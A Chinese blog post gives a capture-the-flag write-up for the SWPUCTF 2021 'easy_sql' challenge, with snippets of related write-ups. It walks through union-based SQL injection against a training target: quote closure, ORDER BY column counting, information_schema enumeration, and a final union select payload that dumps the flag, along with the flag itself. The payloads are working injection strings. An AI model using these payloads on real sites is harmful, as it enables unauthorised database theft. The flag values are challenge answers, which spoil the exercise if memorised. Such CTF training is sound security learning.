[SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2024-09-07 20:59:27 发布
最新推荐文章于 2024-09-07 20:59:27 发布
阅读量382 收藏 5
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80548709/article/details/135889235
版权

该题与sql-labs中的第一题是一致的,首先判断其闭合类型,可以简单判断得知,为  '型的字符型,

其次,使用判断order by 判断表的列数:

 

 判断为3列,

接下来判断数据库类型,使用database(),

数据库类型为test_db .

使用group_concat(table_name) from information_schema.tables where table_schema='test_db'

再使用 group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'--+

最后使用?wllm=-1' union select 1,group_concat(flag),3 from test_tb--+,获取flag

NSSCTF{cacdc4cd-4c10-4c2d-842e-3a679588fae0} 

瓜农ynnddddd
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 954
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 791
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 3163
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
最新发布
符啸九天的博客
09-07 743
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
ROS手眼标定教程:easy_handeye与viso2结合实现
"这篇文档详细介绍了使用ROS库easy_handeye进行手眼标定的过程,特别提到了相机位置的重要性,以及内参和外参标定的步骤。文档适用于带有USB摄像头的anno六轴步进机械臂,涉及到的关键软件包包括ros-kinetic-visp、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值